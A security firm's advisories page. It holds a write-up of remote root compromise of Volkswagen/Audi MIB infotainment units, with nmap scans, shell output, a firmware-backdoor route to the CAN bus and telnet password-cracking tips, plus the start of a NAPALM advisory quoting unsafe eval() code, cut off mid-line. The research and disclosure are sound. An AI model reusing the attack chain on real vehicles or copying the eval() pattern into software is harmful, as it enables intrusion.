2018-08-14 Public release of advisories

Volkswagen Auto Group MIB infotainment system - unauthenticated remote code execution as root

19 July 2018 at 00:00

Introduction

Our world is becoming more and more digital, and the devices we use daily are becoming connected more and more. Thinking of IoT products in domotics and healthcare, it’s easy to find countless examples of how this interconnectedness improves our quality of life.

However, these rapid changes also pose risks. In the big rush forward, we as a society aren’t always too concerned with these risks until they manifest themselves. This is where the hacker community has taken an important role in the past decades: using curiosity and skills to demonstrate that the changes in the name of progress sometimes have a downside that we need to consider.

At Computest, our mission is to improve the quality of the software that surrounds us. While we normally do so through services and consulting to our customers, R&D projects play an important role as well. In 2017 we put significant R&D effort in vehicle security. We chose this topic for a number of reasons, besides it being an interesting topic from a technical point of view. For one because we saw more and more cars in our car park with internet connectivity, often without a convenient mechanism to receive or apply security updates. This ecosystem reminded us of other IoT systems, where we face similar problems concerning remote maintenance. We were interested to see how these effect the current state of security in the automotive vehicle industry. We also felt that this research topic would not only be of interest to us, but would also make the world a little bit safer in an industry that effects us all. Lastly this topic would of course allow us to demonstrate our expertise in the field. This post describes our research approach, the research itself and its findings, the disclosure process with the manufacturer and finally our conclusions.

We are not the first to investigate the current state of security in automotive vehicles, the research of Charlie Miller and Chris Valasek being the most prominent example. They found that the IVI (In-Vehicle Infotainment) system in their car suffered from a trivial vulnerability, which could be reached via the cellular connection because it was unfirewalled. We wanted to see if anything had changed since then, or if the same attack strategy might also succeed to other cars as well.

For this research, we looked at different cars from different models and brands, with the similarity that all cars had internet connectivity. In the end, we focused our research on one specific in-vehicle infotainment (IVI) system, that is used in most cars from the Volkswagen Auto Group and often referred to as MIB. More specifically, in our research we used a Volkswagen Golf GTE and an Audi A3 e-tron.

At Computest we believe in public disclosure of identified vulnerabilities as users should be aware of the risks related to use a specific product or service. But at all times we also consider it our responsibility that nobody is put at unnecessary risk and also no unnecessary damage is caused by such a disclosure.

The vulnerabilities we identified are all software-based, and therefore could be mitigated via a firmware upgrade. However, this cannot be done remotely, but must be done by an official dealer which makes upgrading the entire fleet at once difficult.

Based on above we decided to not provide a full disclosure of our findings in this post. We describe the process we followed, our attack strategy and the system internals, but not the full details on the remote exploitable vulnerability as we would consider that being irresponsible. This might disappoint some readers, but we are fully committed to a responsible disclosure policy and are not willing to compromise on that.

This is also why we first informed the manufacturer about the vulnerability and disclosed all our findings to them, gave them the chance to review this research post and also provide a related statement which we would incorporate into this document. We have received feedback on the research post beginning of February 2018. Prior to release of this research post, Volkswagen sent us the letter that is attached to this post confirming the vulnerabilities. In this letter they also state that the vulnerabilities have been fixed in an update to the infotainment system, which means that new cars produced since the update are not affected by the vulnerabilities we found.

Car anatomy

A modern-day vehicle is much more connected than meets the eye. In the old days, cars were mostly mechanical vehicles that relied on mechanics for functionality like steering and braking to operate. Modern vehicles mostly rely on electronics to control these systems. This is often referred to by drive by wire, and has several advantages over the traditional mechanical approach. Several safety features are possible because components are computer controlled. For example, some cars can and will brake automatically if the front radar detects an obstacle ahead and thinks collision is inevitable. Drive by wire is also used for some luxury functionalities such as automatic parking, by electronically taking over the steering wheel based on radar/camera footage.

All these new functionalities are possible because every component in a modern car is hooked up to a central bus, which is used by components to exchanges messages. The most common bus system is the CAN (Control Area Network) bus, which is present in all cars built since the nineties. Nowadays it controls everything, from steering to unlocking the doors to the volume knob on the radio.

The CAN protocol itself is relatively straight forward. In basis, each message has an arbitration ID and a payload. There is no authentication, authorization, signing, encryption etc. Once you are on the bus you can send arbitrary messages, which will be received by all parties connected to the same bus. There is also no sender or recipient information, each component can decide for itself if a specific message does apply to them.

In theory, this means that if an attacker would gain access to the CAN bus of a vehicle, he or she would control the car. They could impersonate the front radar for example to instruct the braking system to make an emergency stop due to a near collision or take over the steering. The attacker only needs to find a way to actually get access to a component that is connected to the CAN bus, without physical access.

The attacker has a lot of remote attack surface to choose from. Some of them require close proximity to the car, while others are reachable from anywhere around the globe. Some of the vectors will require user interaction, whereas others can be attacked unknowingly to its passengers.

For example, modern cars have a system for monitoring tire pressure, called TPMS (Tire Pressure Monitoring System), which will notify the driver if one of the tiers has a low pressure. This is a wireless system, where the tire will communicate its active pressure either via radio signals or Bluetooth to a receiver inside the car. This receiver will, in turn, notify other components via a message on the CAN bus. The instrument cluster will receive this message and as a response turn on the appropriate warning light. Another example is the key fob that will communicate wirelessly with a receiver in your car, which in its turn will communicate with the locks in the door and with the immobilizer in the engine. All these components have two things in common: they are connected to the CAN bus, and have remote attack surface (namely the receiver).

Modern cars have two main ways of protection against malicious CAN messages. The first is the defensive behavior of all components in a car. Each component is designed to always choose the safest option, in order to protect against components that might be malfunctioning. For example, automatic steering for automatic parking might be disabled by default, only to be enabled when the car is in reverse and at a low speed. And if another, malicious, device on the bus impersonates the front-radar to try to trigger an emergency stop, the real front-radar will continue to spam the bus with messages that the road is clear.

The second protection mechanism is that a modern car has more than one CAN bus, separating safety critical devices from convenience devices. The brakes and engine for example are connected to a high-speed CAN bus, while the air conditioning and windscreen wipers are connected to a separated (and most likely low-speed) CAN bus. In theory these busses should be completely separated, in practice however they are often connected via a so-called gateway. This is because there are circumstances were data must flow from the low-speed to the high-speed CAN bus and vice-versa. For example, the door locks must be able to communicate to the engine to enable and disable the immobilizer, and the IVI system receives status information and error codes from the engine to show on the central display. Firewalling these messages is the responsibility of the gateway, it will monitor every message from every bus and decides which messages are allowed to pass through.

In the last few years we have seen an increase in cars that feature an internet connection, we even have seen cars that have two cellular connections at once. This connection can for example be used by the IVI system to obtain information, such as maps data, or to offer functionalities like an internet browser or a Wi-Fi hotspot or to give owners the ability to control some features via a mobile app. For example, to remotely start the central heating to preheat the car, or by being able to remotely lock/unlock your car. In all situations, the device that has the cellular connection is also hooked up to the CAN bus, which makes it theoretically possible to remotely compromise a vehicle.

This attack vector is not just theory, there have been researchers in the past that succeeded in this goal. Some of these attacks were possible because the cellular connection was not firewalled and had a vulnerable service listening, others relied on the fact that the user would visit an attacker-controlled webpage on the in-car browser and exploited a vulnerability in the rendering engine.

Research goal

A modern car has many remote vectors, such as Bluetooth, TPMS and the key fob. But most vectors require that the attacker is in close proximity to the victim. However, for this research we specifically focused on attack vectors that could be triggered via the internet and without user interaction. Once we would have found such a vector, our goal was to see if we could use this vector to influence either driving behavior or other critical safety components in the car. In general, this would mean that we wanted to gain access to the high-speed CAN bus, which connects components like the brakes, steering wheel and the engine.

We chose the internet vector above others, because such an attack would further illustrate our point of the risks that are involved with the current eco-system. All other vectors require being physically close to the car, making the impact typically limited to only a handful of cars at a time.

We formulated the following research question: “Can we influence the driving behavior or critical security systems of a car via an internet attack vector?”.

Research approach

We started this research with nine different models, from nine different brands. These were all lease cars belonging to employees of Computest. Since we are not the actual owner of the car we asked permission for conducting this research beforehand from both our lease company and the employee driving the car.

We conducted a preliminary research in which we mapped the possible attack vectors of each car. Determining the attack vectors was done by looking at the architecture, reading public documentation and by a short technical review.

Things we were specify searching for:

  • cars with only a single or few layers between the cellular connection and the high-speed CAN bus;
  • cars which allowed us to easily swap SIM cards (since we are not the owner of the cars, soldering, decapping etc. is undesirable);
  • cars that offered a lot of services over cellular or Wi-Fi.

From here we choose the car which we thought would give us the highest chance of success. This is of course subjective and does not guarantee success. For some models getting initial access might be easier than others, but this does say nothing about the effort required for lateral movement.

We finally settled for the Volkswagen Golf GTE as our primary target. We later added the Audi A3 e-tron to our research. Both vehicles share the same IVI-system which, on first sight, seemed to have a broad attack surface, increasing the chance of finding an exploitable vulnerability.

Research findings

Initial access

We started our research initially with a Volkswagen Golf GTE, from 2015, with the Car-Net app. This car has a IVI system manufactured by Harman, referred to as the modular infotainment platform (MIB). Our model was equipped with the newer version (version 2) of this platform, which had several improvements from the previous version (such as Apple CarPlay). Important to note is that our model did not have a separate SIM card tray. We assumed that the cellular connection used an embedded SIM, inside the IVI system, but this assumption would later turn out to be invalid.

The MIB version installed in the Volkswagen Golf has the possibility to connect to a Wi-Fi network. A quick port scan on this port shows that there are many services listening:

$ nmap -sV -vvv -oA gte -Pn -p- 192.168.88.253
Starting Nmap 7.31 ( https://nmap.org ) at 2017-01-05 10:34 CET
Host is up, received user-set (0.0061s latency).
Not shown: 65522 closed ports
Reason: 65522 conn-refused
PORT      STATE    SERVICE         REASON      VERSION
23/tcp    open     telnet          syn-ack     Openwall GNU/*/Linux telnetd
10123/tcp open     unknown         syn-ack
15001/tcp open     unknown         syn-ack
21002/tcp open     unknown         syn-ack
21200/tcp open     unknown         syn-ack
22111/tcp open     tcpwrapped      syn-ack
22222/tcp open     easyengine?     syn-ack
23100/tcp open     unknown         syn-ack
23101/tcp open     unknown         syn-ack
25010/tcp open     unknown         syn-ack
30001/tcp open     pago-services1? syn-ack
32111/tcp open     unknown         syn-ack
49152/tcp open     unknown         syn-ack

Nmap done: 1 IP address (1 host up) scanned in 259.12 seconds

There is a fully functional telnet service listening, but without valid credentials, this seemed like a dead end. An initial scan did not return any valid credentials, and as it later turned out they use passwords of eight random characters. Some of the other ports seemed to be used for sending debug information to the client, like the current radio station and current GPS coordinates. Port 49152 has a UPnP service listening and after some research it was clear that they use PlutinoSoft Platinum UPnP, which is open source. This service piqued our interest because this exact service was also found on the Audi A3 (also from 2015). This car however had only two open ports:

$ nmap -p- -sV -vvv -oA a3 -Pn 192.168.1.1
Starting Nmap 7.31 ( https://nmap.org ) at 2017-01-04 11:09 CET
Nmap scan report for 192.168.1.1
Host is up, received user-set (0.013s latency).
Not shown: 65533 filtered ports
Reason: 65533 no-responses
PORT      STATE  SERVICE REASON       VERSION
53/tcp    open   domain  syn-ack      dnsmasq 2.66
49152/tcp open   unknown syn-ack

Nmap done: 1 IP address (1 host up) scanned in 235.22 seconds

We spent some time reviewing the UPnP source code (but by no means was this a full audit) but didn’t find an exploitable vulnerability.

We initially picked the Golf as primary target because it had more attack surface, but this at least showed that the two systems were built upon the same platform.

After further research, we found a service on the Golf with an exploitable vulnerability. Initially we could use this vulnerability to read arbitrary files from disk, but quickly could expand our possibilities into full remote code execution. This attack only worked via the Wi-Fi hotspot, so the impact was limited. You have to be near the car and it must connect with the Wi-Fi network of the attacker. But we did have initial access:

$ ./exploit 192.168.88.253
[+] going to exploit 192.168.88.253
[+] system seems vulnerable...
[+] enjoy your shell:
uname -a
QNX mmx 6.5.0 2014/12/18-14:41:09EST nVidia_Tegra2(T30)_Boards armle

Because there is no mechanism to update this type of IVI remotely, we made the decision not to disclose the exact vulnerability we used to gain initial access. We think that giving full disclosure could put people at risk, while not adding much to this post.

MMX

The system we had access to identified itself as MMX. It runs on the ARMv7a architecture and uses the QNX operating system, version 6.5.0. It is the main processor in the MIB system and is responsible for things like screen compositing, multimedia decoding, satnav etc.

We noticed that the MMX unit was responsible for the Wi-Fi hotspot functionality, but not for the cellular connection that was used for the Car-Net app. However, we did find an internal network. Finding out what was on the other end was the next step in our research.

# ifconfig mmx0
mmx0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
 address: 00:05:04:03:02:01
 media: <unknown type> autoselect
 inet 10.0.0.15 netmask 0xffffff00 broadcast 10.0.0.255
 inet6 fe80::205:4ff:fe03:201%mmx0 prefixlen 64 scopeid 0x3

One of the problems we faced was the lack of tools on the system and the lack of a build chain to compile our own. For example, we couldn’t get a socket or process list due this. The QNX operating system and build-chain is commercial software, for which we didn’t have a license. At first, we tried to work with the tools that were already present. For example, we relied on a broadcast ping for host discovery, and used the included ftp client for a portscan (which took ages). While cumbersome, we found one other host alive on this network. Eventually we applied for a trial version of QNX. Not expecting much of this we continued our research. But, after a few weeks our application got through, and we received a demo license. Which meant we had access to standard tools like telnet and ps, as well as a build chain.

The device on the other end identified itself as RCC, and also had a telnet service running. We tried logging in using the same credentials, but this initially failed. After further investigating MMX’s configuration it became apparent that MMX and RCC share their filesystems, using Qnet; a QNX proprietary protocol. MMX and RCC are allowed to spawn processes on each other and read files (such as the shadow file). It even turned out that the shadow file on RCC was just a symlink to the shadow file on MMX. It seemed that the original telnet binary did not fully function, causing the password reject message. After some rewriting everything worked as expected.

# /tmp/telnet 10.0.0.16
Trying 10.0.0.16...
Connected to 10.0.0.16.
Escape character is '^]'.


QNX Neutrino (rcc) (ttyp0)

login: root
Password:

     ___           _ _   __  __ ___ _____
    /   |_   _  __| (_) |  \/  |_ _|  _  \
   / /| | | | |/ _  | | | |\/| || || |_)_/
  / __  | |_| | (_| | | | |  | || || |_) \
 /_/  |_|__,__|\__,_|_| |_|  |_|___|_____/

/ > ls –la
total 37812
lrwxrwxrwx  1 root      root             17 Jan 01 00:49 HBpersistence -> /mnt/efs-persist/
drwxrwxrwx  2 root      root             30 Jan 01 00:00 bin
lrwxrwxrwx  1 root      root             29 Jan 01 00:49 config -> /mnt/ifs-root/usr/apps/config
drwxrwxrwx  2 root      root             10 Feb 16  2015 dev
dr-xr-xr-x  2 root      root              0 Jan 01 00:49 eso
drwxrwxrwx  2 root      root             10 Jan 01 00:00 etc
dr-xr-xr-x  2 root      root              0 Jan 01 00:49 hbsystem
lrwxrwxrwx  1 root      root             20 Jan 01 00:49 irc -> /mnt/efs-persist/irc
drwxrwxrwx  2 root      root             20 Jan 01 00:00 lib
drwxrwxrwx  2 root      root             10 Feb 16  2015 mnt
dr-xr-xr-x  1 root      root              0 Jan 01 00:37 net
drwxrwxrwx  2 root      root             10 Jan 01 00:00 opt
dr-xr-xr-x  2 root      root       19353600 Jan 01 00:49 proc
drwxrwxrwx  2 root      root             10 Jan 01 00:00 sbin
dr-xr-xr-x  2 root      root              0 Jan 01 00:49 scripts
dr-xr-xr-x  2 root      root              0 Jan 01 00:49 srv
lrwxrwxrwx  1 root      root             10 Feb 16  2015 tmp -> /dev/shmem
drwxr-xr-x  2 root      root             10 Jan 01 00:00 usr
dr-xr-xr-x  2 root      root              0 Jan 01 00:49 var
/ >

RCC

The RCC unit is a separate chip on the MIB system. The MIB IVI is a modular platform, were they separated all the multimedia handling from the low-level functions. The MMX (multimedia applications unit) processor is responsible for things like the satnav, screen and input control, multimedia handling etc. While the RCC (radio and car control unit) processor handles the low-level communication.

RCC runs on the same version of QNX. It has even fewer tools available, and only a few hundred kilobytes of ram. But because of the Qnet protocol it is possible to run all tools from the MMX unit on RCC.

Communication with the lower level components, like DAB+, CAN, AM/FM decoding etc. are handled via serial connections; either SPI or I2C. The various configuration options can be found under /etc/.

Car-Net

We expected to find a cellular connection on RCC, but we did not. After further research it turned out that the Car-Net functionality is offered by a completely separate unit, and not the IVI. The cellular connection in the Golf is connected to a box which is located behind the instrument cluster, as is shown below.

The Car-Net box uses an embedded SIM card. Since this box offered no other interface options, and we couldn’t make any physical changes to the car (to see if JTAG was available for example), we did not investigate any further.

Audi A3

From here we decided to put our effort back into the Audi A3. It uses the same IVI system, but used a higher-end version. This version has a physical SIM card, which is used by the Audi connect service. We of course already did a port scan via the Wi-Fi hotspot, which turned out empty, but it might be that the results would be different via the cellular connection.

To test this, we needed to be able to do a port scan on the remote interface. This can either be done if the ISP assigns a public routable IPv4 address (unfirewalled), allows client-to-client communication or by using a hacked femtocell. We chose the first option by using a functionality offered by one of the largest ISPs in the Netherlands. They will assign a public IPv4 address if you change certain APN settings. A portscan on this public IP address gave completely different results than our earlier portscan on the Wi-Fi interface:

$ nmap -p0- -oA md -Pn -vvv -A 89.200.70.122
Starting Nmap 7.31 ( https://nmap.org ) at 2017-04-03 09:14:54 CET
Host is up, received user-set (0.033s latency).
Not shown: 65517 closed ports
Reason: 65517 conn-refused
PORT      STATE    SERVICE    REASON      VERSION
23/tcp    open     telnet     syn-ack     Openwall GNU/*/Linux telnetd
10023/tcp open     unknown    syn-ack
10123/tcp open     unknown    syn-ack
15298/tcp filtered unknown    no-response
21002/tcp open     unknown    syn-ack
22110/tcp open     unknown    syn-ack
22111/tcp open     tcpwrapped syn-ack
23000/tcp open     tcpwrapped syn-ack
23059/tcp open     unknown    syn-ack
32111/tcp open     tcpwrapped syn-ack
35334/tcp filtered unknown    no-response
38222/tcp filtered unknown    no-response
49152/tcp open     unknown    syn-ack
49329/tcp filtered unknown    no-response
62694/tcp filtered unknown    no-response
65389/tcp open     tcpwrapped syn-ack
65470/tcp open     tcpwrapped syn-ack
65518/tcp open     unknown    syn-ack

Nmap done: 1 IP address (1 host up) scanned in 464 seconds

Most services are the same as those on the Golf. Some things may differ (like port numbers), possibly because the Audi has the older model of the MIB IVI system. But, more importantly: our vulnerable service is also reachable, and suffers from the same vulnerability!

An attacker can only abuse this vulnerability if the owner has the Audi connect service, and the ISP in the country of the owner allows client-to-client communication, or hands out public IPv4 addresses.

To summarize our research up to this point: we have remote code execution, via the internet, on MMX. From here we can control RCC as well. The next step would be to send arbitrary CAN messages over the bus to see if we can reach any safety critical components.

Renesas V850

The RCC unit is not directly connected to the CAN bus, it has a serial connection (SPI) to a separate chip that handles all CAN communication. This chip is manufactured by Renesas and uses the V850 architecture.

The firmware on this chip doesn’t allow for arbitrary CAN messages to be sent. It has an API that allows a select number of messages to be sent. Most likely, any vulnerabilities in the gateway would require us to send a message that is not on the list, meaning we need a way to let the Renesas chip send us arbitrary messages. The read functionality on the Renesas chip has been disabled, meaning that it is not possible to extract the firmware from the chip easily.

The MIB system does have a software update feature. For this an SD-card, USB stick or CD must be inserted which holds the new firmware. The update sequence is initiated by the MMX unit, which is responsible for the mounting and handling all removable media. When a new firmware image is found, the update sequence will commence.

The update is signed using RSA, but not encrypted. Signature validation is done by the MMX unit, which will then hand over the appropriate update files for RCC and the Renesas chip. The RCC and Renesas chip will trust that the MMX unit already has performed signature validation, and will thus not revalidate the signature for their new firmware. Updating the Renesas V850 chip can be initiated by the RCC unit (using mib2_ioc_flash).

Firmware images are hard to come by. They are only available for official dealers and not for end-users. However, if one can get a hold of the firmware image, it is theoretically possible to backdoor the original firmware image for the Renesas chip, to allow sending arbitrary CAN messages, and flash this new firmware from the RCC unit.

The figure below shows the attack chain up until this point:

Gateway

By backdooring the Renesas chip we are able to send arbitrary CAN messages on the CAN bus. However, the CAN bus we are connected to is dedicated to the IVI system. It is directly connected to a CAN gateway; a physical device used to firewall/filter CAN messages between the different CAN busses.

The gateway is located behind the steering column and is connected with a single connector which has all the different busses connected.

The firmware for the gateway is signed, so backdooring this chip won’t work as it will invalidate the signature. Furthermore, reflashing the firmware is only possible from the debug bus (ODB-II port) and not from the IVI CAN bus. If we want to bypass this chip we need to find an exploitable vulnerability in the firmware. Our first step to achieve this would be to try to extract the firmware from the chip using a physical vector. However, after careful consideration we decided to discontinue our research at this point, since this would potentially compromise intellectual property of the manufacturer and potentially break the law.

USB vector

After finding the remote vector, we discovered a second vector we had not yet explored. For debugging purposes, the MMX unit recognizes a few USB-to-Ethernet dongles as debug interfaces, which will create an extra networking interface. It seems that this network interface will also serve the vulnerable service. The configuration can be found under /etc/usblauncher.lua:

-- D-Link DUB-E100 USB Dongles
device(0x2001, 0x3c05) {
    driver"/etc/scripts/extnet.sh -oname=en,lan=0,busnum=$(busno),devnum=$(devno),phy_88772=0,phy_check,wait=60,speed=100,duplex=1,ign_remove,path=$(USB_PATH) /lib/dll/devnp-asix.so /dev/io-net/en0";
    removal"ifconfig en0 destroy";
};

device(0x2001, 0x1a02) {
    driver"/etc/scripts/extnet.sh -oname=en,lan=0,busnum=$(busno),devnum=$(devno),phy_88772=0,phy_check,wait=60,speed=100,duplex=1,ign_remove,path=$(USB_PATH) /lib/dll/devnp-asix.so /dev/io-net/en0";
    removal"ifconfig en0 destroy";
};

-- SMSC9500
device(0x0424, 0x9500) {
    -- the extnet.sh script does an exec dhcp.client at the bottom, then usblauncher can slay the dhcp.client when the dongle is removed
    driver"/etc/scripts/extnet.sh -olan=0,busnum=$(busno),devnum=$(devno),path=$(USB_PATH) /lib/dll/devn-smsc9500.so /dev/io-net/en0";
    removal"ifconfig en0 destroy";
};

-- Germaneers LAN9514
device(0x2721, 0xec00) {
        -- the extnet.sh script does an exec dhcp.client at the bottom, then usblauncher can slay the dhcp.client when the dongle is removed
        driver"/etc/scripts/extnet.sh -olan=0,busnum=$(busno),devnum=$(devno),path=$(USB_PATH) /lib/dll/devn-smsc9500.so /dev/io-net/en0";
        removal"ifconfig en0 destroy";
};

But even without this service, telnet is also enabled. The version of QNX that is being used only supports descrypt() for password hashing, which has an upper limit of eight characters. One could use a service like crack.sh which can search the entire key space in less than three days using FPGA’s, for only $ 100,-. We found out that the passwords are changed between models/versions; but we think it is doable, both in time and money, to build a dictionary containing all passwords of all different versions of the MIB IVI.

This vector seems to work on all models that use the MIB IVI system, regardless of the version. Since VAG has multiple car brands, components like the IVI are often reused between brands. This vector will therefore most likely also work on cars from, for example, Seat and Skoda.

We tested this vector by changing some kernel parameters on a Nexus 5 phone. This can be done without the need for reflashing, only root privileges are required. After plugging in the phone, it will be recognized as an Ethernet dongle, and the MMX unit will initialize a debug interface.

Disclosure process

At Computest we believe in public disclosure of identified vulnerabilities as users should be aware of the risks related to use a specific product or service. But at all times we also consider it our responsibility that nobody is put at unnecessary risk and also no unnecessary damage is caused by such a disclosure. That means we are fully committed to a responsible disclosure policy and are not willing to compromise on that.

As recommended we decided to contact the manufacturer as soon as we had verified and documented our findings. To do so we were looking for a specific Responsible Disclosure Policy (RDP) on the website of the manufacturer to understand how such a disclosure should be handled from their point of view.

As Volkswagen apparently did not have such a RDP in place, we followed the public Whistleblower System of Volkswagen and contacted the mentioned external lawyer they listed. Opposite to a typical whistleblower disclosure we had no interest nor reason to stay anonymous and disclosed our identity from the very beginning.

With the help of the external lawyer we got in contact with the quality assurance department of the Volkswagen Group mid of July 2017. After some initial conference calls we decided together that a face-to-face meeting would be the best format to disclose our findings and Volkswagen invited us to visit their IT center in Wolfsburg which we followed end of August 2017.

Obviously, Volkswagen required some time to investigate the impact and to perform a risks assessment. At the end of October we received their final conclusion, that they were not going to publish a public statement themselves. But were willing to review our research post to check whether we have stated the facts correctly and we have received the review at the beginning of February 2018. In April 2018, just prior to release of this post, Volkswagen provided us with a letter that confirms the vulnerabilities, and mentions that they have been fixed in a software update to the infotainment system. This means that cars produced since this update are not affected by the vulnerabilities we found. The letter is attached to this report. But based on our experience, it seems that cars which have been produced before are not automatically updated when being serviced at a dealer, thus are still vulnerable to the described attack

When writing this post, we decided to not provide a full disclosure of our findings. We describe the process we followed, our attack strategy and the system internals, but not the full details on the remote exploitable vulnerability as we would consider that being irresponsible. This might disappoint some readers, but we are fully committed to a responsible disclosure policy and are not willing to compromise on that.

In addition to the above we would like to mention that we have consulted an experienced legal advisor early on in this project to make sure our approach and actions are reasonable, and to assess potential (legal) consequences.

Future work

The current chain of attack only allows for the sending and receiving of CAN messages on an isolated CAN bus. As this bus is strictly separated from the high-speed CAN bus via a gateway, the current attack vector poses no direct threat to driver safety.

However, if an exploitable vulnerability in the gateway were to be found, the impact would significantly increase. Future research could focus on the security of the gateway, to see if there is any way to either bypass or compromise this device. There are still some attack vectors on the gateway that are definitely worth exploring. However, this should only be explored in cooperation with the manufacturer.

We are also looking into extending our research to other cars. We still have some interesting leads from our preliminary research that we could follow.

Conclusions

Internet-connected cars are rapidly becoming the norm. As with many other developments, it’s a good idea to sometimes take a step back and evaluate the risks of the path we’ve taken, and whether course adjustments are needed. That’s why we decided to pay attention to the risks related to internet-connected cars. We set out to find a remotely exploitable vulnerability, which required no user interaction, in a modern-day vehicle and from there influence either driving behavior or a safety feature.

With our research, we have shown that at least the first is possible. We can remotely compromise the MIB IVI system and from there send arbitrary CAN messages on the IVI CAN bus. As a result, we can control the central screen, speakers and microphone. This is a level of access that no attacker should be able to achieve. However, it does not directly affect driving behavior or any safety system due to the CAN gateway. The gateway is specifically designed to firewall CAN messages and the bus the IVI is connected to is separated from all other components. Further research on the security of the gateway was consciously not pursued.

We argue that the threat of an adversary with malicious intent was long underestimated. The vulnerability we initially identified should have been found during a proper security test. During our meeting with Volkswagen, we had the impression that the reported vulnerability and especially our approach was still unknown. We understood in our meeting with Volkwagen that, despite it being used in tens of millions of vehicles world-wide, this specific IVI system did not undergo a formal security test and the vulnerability was still unknown to them. However, in their feedback for this post Volkswagen stated that they already knew about this vulnerability.

Speaking with people within the industry we are under the impression that attention on security and awareness is growing, but with the efforts mainly focusing on the models still in development. Component manufactures producing critical components such as brakes, already had security high up in their quality assurance agenda. This focus was not because of the fear of adversaries on the CAN bus, but mainly to protect against component malfunction, which could otherwise result in situations like unintended acceleration.

A remote adversary is new territory for most industrial component manufacturers, which, to be mitigated effectively, requires embedding security in the software development lifecycle. This is a movement that was started years ago in the AppSec world. This is easier in an environment with automatic testing, continuous deployment and possibility to quickly apply updates after release. This is not always possible in the hardware industry, due to local regulations and the ecosystem. It often requires coordination between many vendors. But, if we want to protect future cars, these are problems we have to solve.

However, what about the cars of today, or cars that were shipped last week? They often don’t have the required capabilities (such as over-the-air updates) but will be on our roads for the next fifteen years. We believe they currently pose the real threat to their owners, having drive by wire technology in cars that are internet-connected without any way to reliably update the entire fleet at once.

We believe that the car industry in general, since it isn’t traditionally a software engineering industry, needs to look to other industries and borrow security principles and practices. Looking at mobile phones for instance, the car industry can take valuable lessons regarding trusted execution, isolation and creating an ecosystem for rapid security patching. For instance, components in a car that are remotely accessible, should be able to receive and apply verified security updates without user interaction.

We understand that component malfunction is a higher threat in day-to-day operation. We also understand that having an internet-connected car has its advantages, and we also not trying to reverse this trend. However, we can’t ignore the threats accompanied with today’s internet-connected world.

Recommendations

Based on our findings documented in this research post and our overall experience in IoT security we would like to conclude this post with some recommendations to manufacturers, consumers and ethical hackers.

Recommendations for manufacturers

  • The growing number of connected consumer devices is not only providing tremendous opportunities, but also comes along with additional risks which need to be taken care of. The quality of produced goods is not only about mechanical functionality and quality of materials used, but the quality and security of the embedded software is equally important and therefore requires equal attention in terms of quality assurance.
  • It is common practice, especially in the field of electronics, to purchase components from a third party. That does not clear the manufacturer from the responsibility for their quality and security; these components need to be included in thorough quality assurance. The company selling the completed product should be prepared to take responsibility for its security and quality.
  • Even the best quality control cannot prevent mistakes from being made. In such an event, manufacturers should stand to their responsibility and communicate swiftly and with transparency to affected customers. Hiding cannot only lead to damages on the customer side, but can also have a very negative impact on the manufacturers reputation.
  • Ethical hackers should not be considered as a threat, but as a help to identify existing vulnerabilities. These people often have different views and approaches, enabling them to find vulnerabilities which otherwise would remain undiscovered. Such identified vulnerabilities are important to improve the product quality.
  • Every manufacturer should have a Responsible Disclosure Policy (RDP) stating clearly how external people can report discovered vulnerability in a safe environment. Ethical hackers should not be threatened but encouraged to disclose findings to the manufacturer. See also ‘NCSC Leidraad Responsible Disclosure’ .

Recommendations for consumers

  • Having an internet-connected car brings a number of advantages mostly for consumers. But be aware that this applied technology is still early in its lifecycle and therefore not fully mature yet in terms of quality and security.
  • This can be associated with the possibility to relatively easy get remote access to your car. Although it is very unlikely that this can impact driving behaviour, it might provide access to personal data stored in the car entertainment system and/or your smart phone.
  • Become informed: ask about quality and security standards of car you are looking into as much as you do that for aspects like crash tests. Specifically ask about the remote maintenance possibilities and how long the manufacturer would maintain the software used in the car (support period). If you want to protect yourself against remote threats, please ask your dealer to install updates during their normal service schedule
  • Keep the software in your car up to date where you have the possibility.
  • This does not only apply to cars, but to all IoT devices such as baby monitors, smart TV’s and home automation.

Recommendations for ethical hackers

  • Identifying and disclosing a vulnerability is not about a personal victory or trophy for the hacker, but a responsibility to contribute to safer and better IT systems.
  • In case you have identified a vulnerability, don’t go further than necessary and make sure you don’t harm anybody.
  • Inform the owner / manufacturer of the identified vulnerability first immediately and do not share related information with the press or any other third party. Look for a responsible disclosure policy (RDP) on the website of the manufacturer and follow the policy. In case you can’t find such a RDP, contact the manufacturer (anonymously) and ask for such a policy to help protect your integrity. A good alternative way is to look for a whistle-blower policy and contact the manufacturer this way.
  • Beware that what may look like a simple fix from your perspective as an engineer, can be something completely different in a manufacturing world when applied to the scale of hundreds of thousands of vehicles. Have some patience and empathy for the situation you’re putting the manufacturer in, even though you may be right to do so.
  • It is important to understand the legal regulations relevant for potential research and investigation activities. Different national legislations and limited relevant jurisdiction does not make that easy. Keep in mind: having no criminal intention does not give a free ride to break the law. In case of doubt seek legal advice upfront!

Letter from Volkswagen

Below the letter from Volkswagen we received on April 17 2018. The letter is from the department we have been in contact with from the start of the disclosure process

NAPALM - command execution on NAPLM controller from host

12 July 2017 at 00:00

During a summary code review of NAPALM, Computest found and exploited several issues that allow a compromised host to execute commands on the NAPALM controller and thus gain access to the other hosts controlled by that controller.

This was not a full audit and further issues may or may not be present.

About NAPALM

NAPALM (Network Automation and Programmability Abstraction Layer with Multivendor support) is a Python library that implements a set of functions to interact with different router vendor devices using a unified API.

NAPALM supports several methods to connect to the devices, to manipulate configurations or to retrieve data.

(Taken from their README)

Technical Background

A big threat to a configuration management system like NAPALM, Ansible, Salt Stack and others is compromise of the central node, or controller. If the controller is compromised, an attacker has unfettered access to all hosts that are controlled by the controller. As such, in any deployment, the central node receives extra attention in terms of security measures and isolation, and threats to this node are taken even more seriously.

Issue: Unsafe eval() when validating configurations

The validator allows for a number comparison using < and >. This is handled by the compare_numeric() function in napalm-base/validator.py. The function assumes that the value that is retrieved from the router is also a number and continues to use the eval() function for the actual comparison. However, a compromised device can of course also return an arbitrary string, which will be evaluated.

def compare_numeric(src_num, dst_num):
    """Compare numerical values. You can use '<%d','>%d'."""
    complies = eval(str(dst_num)+src_num)
    if not isinstance(complies, bool):
        return False
    return complies

Issue 2: Unsafe eval() in the IOS XR driver

The eval() function is also used quite extensively in the IOS XR driver. Its use case seems to be to transform a string, from the API, which contains true or false to a Python boolean. When the router is compromised however, the string could contain an arbitrary value that is passed to the eval() function. The difficulty in exploiting this would be that the value is first passed to the title() function before it is evaluated as Python code. The title() function capitalizes the first character of each word in a string.

For example:

multipath = eval((napalm_base.helpers.find_txt(
